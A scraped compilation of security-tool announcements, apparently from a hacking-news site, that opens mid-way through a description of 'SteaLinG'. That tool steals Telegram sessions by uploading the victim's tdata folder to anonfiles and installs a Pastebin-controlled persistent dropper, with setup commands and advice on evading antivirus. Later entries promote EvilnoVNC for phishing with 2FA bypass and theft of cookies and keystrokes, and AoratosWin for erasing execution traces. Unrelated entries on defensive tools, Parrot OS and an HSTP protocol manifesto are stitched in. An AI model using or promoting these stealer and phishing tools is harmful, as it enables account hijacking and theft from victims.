Once you have moved this folder, with all its contents, to the same path on your own device, the session is yours; it is that simple. The tool does all of this; all you have to do is give it your token from the site https://anonfiles.com/. The first step is to go to the path where the tdata folder is located and convert it to a zip file. Of course, if Telegram were running this would not work; if there is any error, it means Telegram is open, so the tool kills its processes. Killing antivirus processes would be seen as malicious behaviour, so that part is avoided entirely with try/except in the code. The name of the archive file includes the name of your victim's device, in case you have more than one. After that, the tool sends a POST request with the zip file to the anonfiles website using the API key (the token of your account on the site, which you will find there). Just that, and it is not flagged by any AV.

module
2- Dropper
  • What does it need from you, and how does it work?
  • Requirements: the first thing it asks for is the URL of the virus (or whatever you want to download to the victim's device). Keep in mind that the URL must be a direct link, meaning it must end with the file itself, e.g. .exe or .png. The second thing it asks for is your Pastebin API key: register on the site, click on API, and you will find it; it will also ask for your username and password. So how does it work?

The first thing it does is create a paste on the site, make it private, and add the URL you gave it. It then gives you the exe file; its function is that when it runs on any device, it starts adding itself to the device registry in two different ways, then opens Pastebin, reads the special paste you created, takes the URL from it, downloads its content and runs it. You can enter a different URL at any time; this is perfectly fine because the dropper checks the URL every 10 minutes, and if it finds it has changed it downloads and runs the new content without you doing anything. So, every 10 minutes, you can literally access your device from anywhere.

3- Linux support

4-You can now choose between Mega or Pastebin

Requirements

  • python >= 3.8 ++ Download Python
  • os : Windows
  • os : Linux

Installation to Windows:

git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py

Installation to Linux

git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python SteaLinG.py

warning:

* Don't upload to VirusTotal.com, because this tool will stop working over time if you do.
* VirusTotal shares signatures with AV companies.
* Again, don't be an idiot!

AV detection


Media



Monkey365 - Tool For Security Consultants To Easily Conduct Not Only Microsoft 365, But Also Azure Subscriptions And Azure Active Directory Security Configuration Reviews


Monkey365 is an Open Source security tool that can be used to easily conduct not only Microsoft 365, but also Azure subscriptions and Azure Active Directory security configuration reviews without the significant overhead of learning tool APIs or complex admin panels from the start. To help with this effort, Monkey365 also provides several ways to identify security gaps in the desired tenant setup and configuration. Monkey365 provides valuable recommendations on how to best configure those settings to get the most out of your Microsoft 365 tenant or Azure subscription.


Introduction

Monkey365 is a plugin-based PowerShell module that can be used to review the security posture of your cloud environment. With Monkey365 you can scan for potential misconfigurations and security issues in public cloud accounts according to security best practices and compliance standards, across Azure, Azure AD, and Microsoft365 core applications.

Installation

You can either download the latest zip by clicking this link or download Monkey365 by cloning the repository:
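
For example, a sketch of the clone approach; the repository location is an assumption, so check the project page for the canonical URL:

git clone https://github.com/silverhack/monkey365.git c:\monkey365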

Once downloaded, you must extract the files to a suitable directory. Once you have unzipped the zip file, you can use the PowerShell V3 Unblock-File cmdlet to unblock the files:

Get-ChildItem -Recurse c:\monkey365 | Unblock-File

Once you have installed the monkey365 module on your system, you will likely want to import the module with the Import-Module cmdlet. Assuming that Monkey365 is located in the PSModulePath, PowerShell would load monkey365 into active memory:

Import-Module monkey365

If Monkey365 is not located on a PSModulePath path, you can use an explicit path to import:

Import-Module C:\temp\monkey365

You can also use the Force parameter in case you want to reimport the Monkey365 module into the same session

Import-Module C:\temp\monkey365 -Force

Basic Usage

The following command will provide the list of available command line options:

Get-Help Invoke-Monkey365

To get a list of examples use:

Get-Help Invoke-Monkey365 -Examples

To get a list of all options and examples with detailed info use:

Get-Help Invoke-Monkey365 -Detailed

The following example will retrieve data and metadata from Azure AD and SharePoint Online and then print results. If credentials are not supplied, Monkey365 will prompt for credentials.

$param = @{
Instance = 'Microsoft365';
Analysis = 'SharePointOnline';
PromptBehavior = 'SelectAccount';
IncludeAzureActiveDirectory = $true;
ExportTo = 'PRINT';
}
$assets = Invoke-Monkey365 @param

Regulatory compliance checks

Monkey365 helps streamline the process of performing not only Microsoft 365, but also Azure subscriptions and Azure Active Directory Security Reviews.

160+ checks covering industry defined security best practices for Microsoft 365, Azure and Azure Active Directory.

Monkey365 will help consultants to assess cloud environments and to analyze the risk factors according to controls and best practices. The report will contain structured data for quick checking and verification of the results.

Supported standards

By default, the HTML report shows you the CIS (Center for Internet Security) Benchmark. The CIS Benchmarks for Azure and Microsoft 365 are guidelines for security and compliance best practices.

The following standards are supported by Monkey365:

  • CIS Microsoft Azure Foundations Benchmark v1.4.0
  • CIS Microsoft 365 Foundations Benchmark v1.4.0

More standards will be added in future releases (NIST, HIPAA, GDPR, PCI-DSS, etc.) as they become available.

Additional information such as Installation or advanced usage can be found in the following link



American Fuzzy Lop plus plus 4.04c

Google's American Fuzzy Lop is a brute-force fuzzer coupled with an exceedingly simple but rock-solid instrumentation-guided genetic algorithm. afl++ is a superior fork to Google's afl. It has more speed, more and better mutations, more and better instrumentation, custom module support, etc.

OpenSSL Toolkit 3.0.6

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols with full-strength cryptography world-wide. The 3.x series is the current major version of OpenSSL.
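
For example, a few common openssl command-line operations (the host and file names are hypothetical):

openssl version                                # show the installed version
openssl s_client -connect example.com:443      # inspect a TLS handshake
openssl x509 -in certificate.pem -noout -text  # dump a certificate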

OpenSSL Toolkit 1.1.1r

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols with full-strength cryptography world-wide.

HSTP - Simple Hyper Service Transfer Protocol On Networks



The protocol aims to develop an application-layer abstraction for the Hyper Service Transfer Protocol.

HSTP is recursive by nature. This protocol implements itself as an interface. On every internet-connected device there is an HSTP instance; that's why adoption is not needed. HSTP is already running on top of the internet. We have just now managed to explain the protocol over protocols on heterogeneous networks. That's why you should not compare it with web2, web3, or vice versa.

Abstract

HSTP is an application representation interface for heterogeneous networks.

The HSTP interface enforces implementing a set of methods to be able to communicate with other nodes in the network. Thus servers, clients, and other nodes can communicate with each other in a trust-based, end-to-end encrypted way. For the time being, node resolution is based on a fastest-path resolution algorithm I wrote.


Protocol 4 Babies

Story time!

  • Baby crying!
  • Needs milk!
  • Mommy has a problem.
  • Father has a problem.
  • Let's fix this!

A small overview

Think about it: we're in a situation where one mother and one father live a happy life. They had a baby! Suddenly, the mother needed to take pills regularly to cure a disease. The pills are poison for the baby. The baby is crying and the mother calls the father, because he is the only trusted person who can help the baby. But the father sometimes cannot stay at home; he needs to do something to feed the baby. The father heard that one milkman has fresh, high-quality milk for a low price. The father decides to talk to the milkman; the milkman delivers the milk to the father; the father carries the milk to the mother. The mother gives the milk to the baby. The baby is happy now and sleeps, and the mother sees the baby is happy.

The family never buys milk from outside; this is the first time they buy milk for the baby. (Mom does not know the milkman's number; the milkman does not know the home address.)

As steps:

0) - Baby wants to drink milk.
1) - Baby cries to the mom.
2) - Mom sees the baby is crying.
3) - Mom checks the fridge. Mom sees the milk is empty. (Mother only trusts the Father)
4) - Mom calls the father.
5) - Father calls the milkman.
6) - Milkman delivers the milk to father.
7) - Father delivers the milk to mom.
8) - Mom gives the milk to the baby.
9) - Baby drinks the milk.
10) - Baby is happy.
11) - Baby sleeps.
12) - Mother sees the baby is happy and sleeps.
13) - In order to be able to contact the milkman again, the mother asks the father to tell the milkman to save the address of the house and the mother's mobile phone number.
14) - Mother calls the father.
15) - Father calls the milkman.
16) - Milkman saves the address of the house and the mother's mobile phone number.

Oops, tomorrow the baby wakes up and cries again:
0) - Baby wants to drink milk.
1) - Baby cries to the mom.
2) - Mom sees the baby is crying.
3) - Mom checks the fridge. Mom sees the milk is empty. (Mother trusts that the Father made the right decision in the first place by giving the address to the milkman, and that the milkman made the right decision in the first place by saving the address of the house and the mother's mobile phone number.)
4) - Mother calls the milkman. (Mother is trusting the Father's decision only)
5) - Milkman delivers the milk to mom.
6) - Mom gives the milk to the baby.
7) - Baby drinks the milk.
8) - Baby is happy.
9) - Baby sleeps.
10) - Mother sees the baby is happy and sleeps.
11) - Mother is happy and the mother trusts the milkman now.

This document you're reading is a manifesto for people on the internet: connect other people by trusting the service that serves the client, and that trust can only be maintained by providing good services. Trust is the key, but it is not enough to survive. The service has to be reliable, consistent, and cheap; otherwise, people will decide not to ask you again.

So, it's easy, right? It's simple to understand. Who are those people in the story?

  • Baby is a client.
  • Mom is a client.
  • Father is a client.
  • Milkman is a server.

also,

  • Baby could be a server in [TIME].
  • Mom is a server for baby.
  • Father is a server for mom.
  • Milkman is a server for father.
  • Milkman is a server for mom.

Baby is in trusted hands. Nothing to worry about. They love you, you will understand when you grow up and have a child.

// Technical step explanation soon, but not that hard as you see.

What is HSTP?

HSTP is an interface, which is a set of methods that must be implemented by the application layer. The interface is used to communicate with other nodes in the network. The interface is designed to be used in a heterogeneous network.

What is an HSTP node?

HSTP shall be implemented on any layer of network-connected devices/environments.

An HSTP node could be a TCP server, an HTTP server, a static file or a contract on any chain. One HSTP node is able to call any other HSTP node. Thus the nodes can call each other freely, check each other's system status, and communicate with each other.

What kind of abstraction layer for networks?

HSTP is already implemented at the language level, by people for people. English is the most widely adopted language around the Earth. JavaScript could be considered the most widely adopted language for browser environments. Solidity is for EVM-based chains, hyperbees for TCP-based networks, etc.

HSTP interface shall be applied between any HSTP connected devices/networks.

  • [Universe] talks to [Universe] via [HSTP]
    • [Kind] universe talks over world.
      • [World] Earth talks with sound frequencies and HSTP.
        • [Country] X sound frequencies on Xish and HSTP.
          • [Community] CommunityX Xish on CommunityXish.
        • [Country] Y talks Yish and HSTP.
        • [Country] Z talks Zish and HSTP.
      • [World] Mars talks with radio frequencies.
        • [Bacteria] UUU-1 talks UUU-1ish and HSTP.
          • Info: UUU-1 can call, universe/kind/world/Earth/X/CommunityX/query
      • [World] Jupiter talks with light frequencies and do not implements HSTP.
        • Info: If the Earth wants to talk with Jupiter, we can add one HSTP to Jupiter proxy on universe.
    • [Kind] universe talks over atoms and HSTP.
      • [Atoms] ... and HSTP.
        • ... and HSTP.
          • [Y] ... and HSTP.
            • Info: [Y] can talk with universe/kind/world/Mars/Bacteria/UUU-1/query
      • [Atoms] ... and HSTP.
        • ... and HSTP.
          • [Y] ... and HSTP.
            • Info: [Y] can talk with universe/kind/world/Mars/Bacteria/UUU-1/query Info: Kind universe can talk with Mars, and Mars also can talk with Kind universe.

What is the purpose of HSTP?

Infinite scaling options: Any TCP-connected device can talk with any other TCP-connected device over HSTP. That means any web browser can serve another HSTP node, and any web browser can call any other web browser.

Uniform application representation interface: HSTP is a uniform interface, which is a set of methods that must be implemented by the application layer.

Heterogeneous networks: Any participant of the network is allowed to share resources with other participants of the network. The resources can be CPU, memory, storage, network, etc.

Conjugation of web versions: Since blockchain technologies became known as web3, people started discussing the differences between the webs. Comparing them is the mindset of an incremental-numbering education. Which one is better? None of them. We have to build systems that can talk in one uniform protocol, where the underlying services can be anything. HSTP is aiming for that.

What are the components of HSTP?

Registry interface: The registry interface is designed for use on the TCP layer, to be able to register top-level (TLD) nodes in the network. The first implementation of the HSTP TCP relay will resolve hstp/

The registry has two parts of the interface:

  • Register method, which is used to register a new node in the network.
  • Resolve method, which is used to resolve a node in the network.

The registry implementation needs two HSTP nodes:

  1. Hyperbees
  • Heterogeneous networks will resolve the registry over RPC, TCP, HTTP, HSTP, etc.
  2. Registry.sol on any EVM-based chain (Ethereum, Binance Smart Chain, Polygon, etc.)
  • Registry.sol will resolve the registry of HSTP nodes. That can be relayed over other networks.

Router interface

For demonstration purposes, we will use the following solidity example:

// SPDX-License-Identifier: GNU-3.0-or-later
pragma solidity ^0.8.0;

import "./HSTP.sol";
import "./ERC165.sol";

enum Operation {
Query,
Mutation
}

struct Response {
uint256 status;
string body;
}

struct Registry {
HSTP resolver;
}

// HSTP/Router.sol
abstract contract Router is ERC165 {
event Log(address indexed sender, Operation operation, bytes payload);
event Register(address indexed sender, Registry registry);
mapping(string => Registry) public routes;

function reply(string memory name, Operation _operation, bytes memory payload) public virtual payable returns(Response memory response) {
emit Log(msg.sender, _operation, payload);
// Traverse upwards and downwards of the tree.
// Tries to find the closest path for given operation.
// If the route is registered on HSTP node, reply from children node.
// If the node do not have the route on this node, ask for parent.
if (address(routes[name].resolver) != address(0)) {
if (_operation == Operation.Query) {
return this.query(payload);
} else if (_operation == Operation.Mutation) {
return this.mutation(payload);
}
}
return super.reply(name, _operation, payload);
}

function query(string memory name, bytes memory payload) public view returns (Response memory) {
return routes[name].resolver.query(payload);
}

function mutation(string memory name, bytes memory payload) public payable returns (Response memory) {
return routes[name].resolver.mutation(payload);
}

function register(string memory name, HSTP node) public {
Registry memory registry = Registry({
resolver: node
});
emit Register(msg.sender, registry);
routes[name] = registry;
}

function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
return interfaceId == type(HSTP).interfaceId;
}
}

HSTP interface

// SPDX-License-Identifier: GNU-3.0-or-later
pragma solidity ^0.8.0;

import "./Router.sol";

// Stateless Hyper Service Transfer Protocol for on-chain services.
// Will implement: EIP-4337 when it's on final stage.
// https://github.com/ethereum/EIPs/blob/master/EIPS/eip-4337.md
abstract contract HSTP is Router {
    constructor(string memory name) {
        register(name, this);
    }

    function query(bytes memory payload)
        public
        view
        virtual
        returns (Response memory);

    function mutation(bytes memory payload)
        public
        payable
        virtual
        returns (Response memory);
}

Example HSTP Node

HSTP node has access to call parent router by super.reply(name, operation, payload) method. HSTP node can also call children nodes by calling this.query(payload) or this.mutation(payload) methods.

An HSTP node can be a smart contract, a web browser, or a TCP-connected device.

A node has the full capability of adding more HSTP nodes to the network, or adding itself as a sub-service.

(Diagram: a tree of HSTP nodes, where each HSTP node can have further HSTP nodes as children.)

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;

import "hstp/HSTP.sol";

// Stateless Hyper Service Transfer Protocol for on-chain services.
contract Todo is HSTP("Todo") {

    struct ITodo {
        string todo;
    }

    function addTodo(ITodo memory request) public payable returns (Response memory response) {
        response.body = request.todo;
        return response;
    }

    // Override for HSTP.
    function query(bytes memory payload)
        public
        view
        virtual
        override
        returns (Response memory) {}

    function mutation(bytes memory payload)
        public
        payable
        virtual
        override
        returns (Response memory) {
        (ITodo memory request) = abi.decode(payload, (ITodo));
        return this.addTodo(request);
    }
}

Proposal

The Ethereum proposal is a draft for now, but the protocol has a reference implementation, Todo.sol.

Awesome web services running on top of HSTP

Full list here

Hello world

You can test HSTP and try it on Remix now.

How to play with the protocol?

  • Copy the source code below to https://remix.ethereum.org/
  • Deploy it on any EVM-based chain.
  • Call the functions and try different network topologies on HSTP.
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;

import "hstp/HSTP.sol";

// Stateless Hyper Service Transfer Protocol for on-chain services.
contract Todo is HSTP("Todo") {

    struct TodoRequest {
        string todo;
    }

    function addTodo(TodoRequest memory request) public payable returns (Response memory response) {
        response.body = request.todo;
        return response;
    }

    // Override for HSTP.
    function query(bytes memory payload)
        public
        view
        virtual
        override
        returns (Response memory) {}

    function mutation(bytes memory payload)
        public
        payable
        virtual
        override
        returns (Response memory) {
        (TodoRequest memory todoRequest) = abi.decode(payload, (TodoRequest));
        return this.addTodo(todoRequest);
    }
}

Contribute:

Developer level contribution

  • Write a todo application with HSTP, deploy with remix and test it.
  • Draw example architecture of HSTP (serviceless architecture).

Core level contribution

  • Implement TCP layer HSTP interface on hyperbees [Universe]
    • hyperbees with HSTP will be the first implementation of HSTP.
    • That will cover the universe phase of networks and bring us a fully decentralized web on HSTP.
  • Implement RPC layer HSTP interface on Solidity [Web3]
  • Implement complex serviceless architecture on HSTP interface with Solidity [Web3]
  • Implement HTTP layer HSTP interface on JavaScript [Web]

Inspirations:

License

GNU GENERAL PUBLIC LICENSE V3

Core Contributors

Author

Cagatay Cali



EvilnoVNC - Ready To Go Phishing Platform


EvilnoVNC is a Ready to go Phishing Platform.

Unlike other phishing techniques, EvilnoVNC allows 2FA bypassing by using a real browser over a noVNC connection.

In addition, this tool allows us to see in real time all of the victim's actions, access to their downloaded files and the entire browser profile, including cookies, saved passwords, browsing history and much more.


Requirements

  • Docker
  • Chromium

Download

It's recommended to clone the complete repository or download the zip file.
Additionally, it's necessary to build the Docker image manually. You can do this by running the following commands:

git clone https://github.com/JoelGMSec/EvilnoVNC
cd EvilnoVNC ; sudo chown -R 103 Downloads
sudo docker build -t joelgmsec/evilnovnc .

Usage

./start.sh -h

_____ _ _ __ ___ _ ____
| ____|_ _(_) |_ __ __\ \ / / \ | |/ ___|
| _| \ \ / / | | '_ \ / _ \ \ / /| \| | |
| |___ \ V /| | | | | | (_) \ V / | |\ | |___
|_____| \_/ |_|_|_| |_|\___/ \_/ |_| \_|\____|

---------------- by @JoelGMSec --------------

Usage: ./start.sh $resolution $url

Examples:
1280x720 16bits: ./start.sh 1280x720x16 http://example.com
1280x720 24bits: ./start.sh 1280x720x24 http://example.com
1920x1080 16bits: ./start.sh 1920x1080x16 http://example.com
1920x1080 24bits: ./start.sh 1920x1080x24 http://example.com

The detailed guide of use can be found at the following link:

https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc

Features & To Do

  • Export Evil-Chromium profile to host
  • Save download files on host
  • Disable parameters in URL (like password)
  • Disable key combinations (like Alt+1 or Ctrl+S)
  • Disable access to Thunar
  • Decrypt cookies in real time
  • Expand cookie life to 99999999999999999
  • Dynamic title from original website
  • Dynamic resolution from preload page
  • Replicate real user-agent and other stuff
  • Basic keylogger

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

Original idea by @mrd0x: https://mrd0x.com/bypass-2fa-using-novnc
This tool has been created and designed from scratch by Joel Gรกmez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



cryptmount Filesystem Manager 6.1.0

cryptmount is a utility for creating and managing secure filing systems on GNU/Linux systems. After initial setup, it allows any user to mount or unmount filesystems on demand, solely by providing the decryption password, with any system devices needed to access the filing system being configured automatically. A wide variety of encryption schemes (provided by the kernel dm-crypt system and the libgcrypt library) can be used to protect both the filesystem and the access key. The protected filing systems can reside in either ordinary files or disk partitions. The package also supports encrypted swap partitions, and automatic configuration on system boot-up.

AoratosWin - A Tool That Removes Traces Of Executed Applications On Windows OS

AoratosWin is a tool that removes traces of executed applications on Windows OS which can easily be listed with tools such as ExecutedProgramList by Nirsoft.

(Feel free to decompile, reverse, redistribute, etc.)


Supported OS (Tested On)

  • Windows 7 (x86, x64)
  • Windows 8 (x86, x64)
  • Windows 8.1 (x86, x64)
  • Windows 10 (x86, x64)
  • Windows 11 (x64)

Minimum System Reqs:

  • .NET Framework 4.0

Disclaimer

Any actions and/or activities related to this tool are solely your responsibility.



Cloudfox - Automating Situational Awareness For Cloud Penetration Tests


CloudFox helps you gain situational awareness in unfamiliar cloud environments. It's an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.

CloudFox helps you answer the following common questions (and many more):

  • What regions is this AWS account using and roughly how many resources are in the account?
  • What secrets are lurking in EC2 userdata or service specific environment variables?
  • What actions/permissions does this [principal] have?
  • Which role trusts are overly permissive or allow cross-account assumption?
  • What endpoints/hostnames/IPs can I attack from an external starting point (public internet)?
  • What endpoints/hostnames/IPs can I attack from an internal starting point (assumed breach within the VPC)?
  • What filesystems can I potentially mount from a compromised resource inside the VPC?

Quick Start

CloudFox is modular (you can run one command at a time), but there is an aws all-checks command that will run the other aws commands for you with sane defaults:

cloudfox aws --profile [profile-name] all-checks

CloudFox is designed to be executed by a principal with limited read-only permissions, but its purpose is to help you find attack paths that can be exploited in simulated compromise scenarios (aka objective-based penetration testing).

For the full documentation please refer to our wiki.

Supported Cloud Providers

Provider CloudFox Commands
AWS 15
Azure 2 (alpha)
GCP Support Planned
Kubernetes Support Planned

Install

Option 1: Download the latest binary release for your platform.

Option 2: Install Go, clone the CloudFox repository and compile from source

# git clone https://github.com/BishopFox/cloudfox.git
...omitted for brevity...
# cd ./cloudfox
# go build .
# ./cloudfox

Prerequisites

AWS

  • AWS CLI installed
  • Supports AWS profiles, AWS environment variables, or metadata retrieval (on an ec2 instance)
  • A principal with one recommended policies attached (described below)
  • Recommended attached policies: SecurityAudit + CloudFox custom policy

Additional policy notes (as of 09/2022):

Policy Notes
CloudFox custom policy Has a complete list of every permission cloudfox uses and nothing else
arn:aws:iam::aws:policy/SecurityAudit Covers most cloudfox checks but is missing newer services or permissions like apprunner:*, grafana:*, lambda:GetFunctionURL, lightsail:GetContainerServices
arn:aws:iam::aws:policy/job-function/ViewOnlyAccess Covers most cloudfox checks but is missing newer services or permissions like AppRunner:*, grafana:*, lambda:GetFunctionURL, lightsail:GetContainerServices - and is also missing iam:SimulatePrincipalPolicy.
arn:aws:iam::aws:policy/ReadOnlyAccess Only missing AppRunner, but also grants things like "s3:Get*" which can be overly permissive.
arn:aws:iam::aws:policy/AdministratorAccess This will work just fine with CloudFox, but if you were handed this level of access as a penetration tester, that should probably be a finding in itself :)

Azure

  • Viewer or similar permissions applied.

Supported Commands

Provider Command Name Description
AWS all-checks Run all of the other commands using reasonable defaults. You'll still want to check out the non-default options of each command, but this is a great place to start.
AWS access-keys Lists active access keys for all users. Useful for cross referencing a key you found with which in-scope account it belongs to.
AWS buckets Lists the buckets in the account and gives you handy commands for inspecting them further.
AWS ecr List the most recently pushed image URI from all repositories. Use the loot file to pull selected images down with docker/nerdctl for inspection.
AWS endpoints Enumerates endpoints from various services. Scan these endpoints from both an internal and external position to look for things that don't require authentication, are misconfigured, etc.
AWS env-vars Grabs the environment variables from services that have them (App Runner, ECS, Lambda, Lightsail containers, and Sagemaker are supported). If you find a sensitive secret, use cloudfox iam-simulator AND pmapper to see who has access to them.
AWS filesystems Enumerate the EFS and FSx filesystems that you might be able to mount without creds (if you have the right network access). For example, this is useful when you have ec2:RunInstances but not iam:PassRole.
AWS iam-simulator Like pmapper, but uses the IAM policy simulator. It uses AWS's evaluation logic, but notably, it doesn't consider transitive access via privesc, which is why you should always also use pmapper.
AWS instances Enumerates useful information for EC2 Instances in all regions like name, public/private IPs, and instance profiles. Generates loot files you can feed to nmap and other tools for service enumeration.
AWS inventory Gain a rough understanding of size of the account and preferred regions.
AWS outbound-assumed-roles List the roles that have been assumed by principals in this account. This is an excellent way to find outbound attack paths that lead into other accounts.
AWS permissions Enumerates IAM permissions associated with all users and roles. Grep this output to figure out what permissions a particular principal has rather than logging into the AWS console and painstakingly expanding each policy attached to the principal you are investigating.
AWS principals Enumerates IAM users and Roles so you have the data at your fingertips.
AWS role-trusts Enumerates IAM role trust policies so you can look for overly permissive role trusts or find roles that trust a specific service.
AWS route53 Enumerate all records from all route53 managed zones. Use this for application and service enumeration.
AWS secrets List secrets from SecretsManager and SSM. Look for interesting secrets in the list and then see who has access to them using cloudfox iam-simulator and/or pmapper.
Azure instances-map Enumerates useful information for Compute instances in all available resource groups and subscriptions
Azure rbac-map Enumerates Role Assignments for all tenants

Authors

Contributing

Wiki - How to Contribute

TODO

  • AWS - Add support for GovCloud and China regions
  • AWS - Add support for hardcoded region (which would override the default of looking in every region)

FAQ

How does CloudFox compare with ScoutSuite, Prowler, Steampipe's AWS Compliance Module, AWS Security Hub, etc.?

CloudFox doesn't create any alerts or findings, and doesn't check your environment for compliance to a baseline or benchmark. Instead, it simply enables you to be more efficient during your manual penetration testing activities. It gives you the information you'll likely need to validate whether an attack path is possible or not.

Why do I see errors in some CloudFox commands?

  • Services that don't exist in all regions - CloudFox currently makes the same API calls to every region. However, not all regions support all services. For instance, services like Appstream and AWS Grafana are only supported in a subset of the total regions. In the future, we plan to make CloudFox aware of which services run in each region.
  • You don't have permission - Another reason you might see errors is that you don't have permission to make the calls CloudFox is making, either because the policy doesn't allow it (e.g., SecurityAudit doesn't allow all of the permissions CloudFox needs), or because an SCP is blocking you.

You can always look in the ~/.cloudfox/cloudfox-error.log file to get more information on errors.

Prior work and other related projects

  • SmogCloud - Inspiration for the endpoints command
  • SummitRoute's AWS Exposable Resources - Inspiration for the endpoints command
  • Steampipe - We used steampipe to prototype many cloudfox commands. While CloudFox is laser focused on helping cloud penetration testers, steampipe is an easy way to query any and all of your cloud resources.
  • Principal Mapper - Inspiration for, and a strongly recommended partner to the iam-simulator command
  • Cloudsplaining - Inspiration for the permissions command
  • ScoutSuite - Excellent cloud security benchmark tool. Provided inspiration for the --userdata functionality in the instances command, the permissions command, and many others
  • Prowler - Another excellent cloud security benchmark tool.
  • Pacu - Excellent cloud penetration testing tool. PACU has quite a few enumeration commands similar to CloudFox, and lots of other commands that automate exploitation tasks (something that CloudFox avoids by design)
  • CloudMapper - Inspiration for the inventory command and just generally CloudFox as a whole


Parrot 5.1 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

Parrot OS 5.1 is officially released. We're proud to say that the new version of Parrot OS 5.1 is available for download; this new version includes a lot of improvements and updates that makes the distribution more performing and more secure.

How do I get Parrot OS?

You can download Parrot OS by clicking here and, as always, we invite you to never trust third-party and unofficial sources.

If you need any help or in case the direct downloads don't work for you, we also provide official Torrent files, which can circumvent firewalls and network restrictions in most cases.

How do I upgrade from a previous version?

First of all, we always suggest updating your version to be sure that it is stable and functional. You can upgrade an existing system via APT using one of the following commands:

  • sudo parrot-upgrade

or

  • sudo apt update && sudo apt full-upgrade

Even though we recommend always updating your version, it is also recommended to make a backup and re-install the latest version for a cleaner and more reliable user experience, especially if you upgrade from a very old version of Parrot.

What's new in Parrot OS 5.1

New kernel 5.18.

You can find all the info about the new Kernel 5.18 by clicking on this link.

Updated docker containers

Our docker offering has been revamped! We now provide our dedicated parrot.run image registry along with the default docker.io one.

All our images are now natively multiarch, and support amd64 and arm64 architectures.

Our containers offering was updated as well, and we are committed to further improve it.

Run docker run --rm -ti --network host -v $PWD/work:/work parrot.run/core and give our containers a try without having to install the system, or visit our Docker images page to explore the other containers we offer.

Updated backports.

Several packages were updated and backported, like the new Golang 1.19 or LibreOffice 7.4. This is part of our commitment to provide the latest version of the most important software while keeping a stable LTS release model.

To make sure to have all the latest packages installed from our backports channel, use the following commands:

  • sudo apt update
  • sudo apt full-upgrade -t parrot-backports

System updates

The system has received important updates to some of its key packages, like parrot-menu, which now provides additional launchers for our newly imported tools; or parrot-core, which now provides a new Firefox profile with improved security hardening, plus some minor bugfixes to our zshrc configuration.

Firefox profile overhaul

As mentioned earlier, our Firefox profile has received a major update that significantly improves the overall privacy and security.

Our bookmarks collection has been revamped, and now includes new resources, including OSINT services, new learning sources and other useful resources for hackers, developers, students and security researchers.

We have also boosted our effort to avoid Mozilla telemetry and bring DuckDuckGo back as the default search engine, while we are exploring other alternatives for the future.

Tools updates

Most of our tools have received major version updates, especially our reverse engineering tools, like rizin and rizin-cutter.

Important updates involved metasploit, exploitdb and other popular tools as well.

New AnonSurf 4.0

The new AnonSurf 4 represents a major upgrade for our popular anonymity tool.

AnonSurf is our in-house anonymity solution that routes all the system traffic through Tor automatically, without having to set up proxy settings for each individual program, and prevents traffic leaking in most cases.

The new version provides significant fixes and reliability updates, fully supports debian systems without the old resolvconf setup, has a new user interface with improved system tray icon and settings dialog window, and offers a better overall user experience.

Parrot IoT improvements

Our IoT version now implements significant performance improvements for the various Raspberry Pi boards, and finally includes Wi-Fi support for the Raspberry Pi 400 board.

The Parrot IoT offering has also been expanded, and it now offers Home and Security editions as well, with a full MATE desktop environment exactly like the desktop counterpart.

Architect Edition improvements

Our popular Architect Edition now implements some minor bugfixes and is more reliable than ever.

The Architect Edition is a special edition of Parrot that enables the user to install a barebone Parrot Core system, and then offers a selection of additional modules to further customize the system.

You can use Parrot Architect to install other desktop environments like KDE, GNOME or XFCE, or to install a specific selection of tools.

New infrastructure powered by Parrot and Kubernetes

The Architect Edition is also used internally by the Parrot Engineering Team to install Parrot Server Edition on all the servers that power our infrastructure, which is officially 100% powered by Parrot and Kubernetes.

This is a major change in the way we handle our infrastructure, which enables us to implement better autoscaling, easier management, smaller attack surface and an overall better network, with the improved scalability and security we were looking for.



Arsenal - Recon Tool installer



Arsenal is a simple shell script (Bash) used to install the most important tools and requirements for your environment, saving you the time of installing all these tools one by one.


Tools in Arsenal

Name description
Amass The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques
ffuf A fast web fuzzer written in Go
dnsX Fast and multi-purpose DNS toolkit allow to run multiple DNS queries
meg meg is a tool for fetching lots of URLs but still being 'nice' to servers
gf A wrapper around grep to avoid typing common patterns
XnLinkFinder This is a tool used to discover endpoints crawling a target
httpX httpx is a fast and multi-purpose HTTP toolkit allow to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads
Gobuster Gobuster is a tool used to brute-force (DNS,Open Amazon S3 buckets,Web Content)
Nuclei Nuclei tool is Golang Language-based tool used to send requests across multiple targets based on nuclei templates leading to zero false positive or irrelevant results and provides fast scanning on various host
Subfinder Subfinder is a subdomain discovery tool that discovers valid subdomains for websites by using passive online sources. It has a simple modular architecture and is optimized for speed. subfinder is built for doing one thing only - passive subdomain enumeration, and it does that very well
Naabu Naabu is a port scanning tool written in Go that allows you to enumerate valid ports for hosts in a fast and reliable manner. It is a really simple tool that does fast SYN/CONNECT scans on the host/list of hosts and lists all ports that return a reply
assetfinder Find domains and subdomains potentially related to a given domain
httprobe Take a list of domains and probe for working http and https servers
knockpy Knockpy is a python3 tool designed to quickly enumerate subdomains on a target domain through dictionary attack
waybackurl fetch known URLs from the Wayback Machine for *.domain and output them on stdout
Logsensor A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning
Subzy Subdomain takeover tool which works based on matching response fingerprints from can-i-take-over-xyz
Xss-strike Advanced XSS Detection Suite
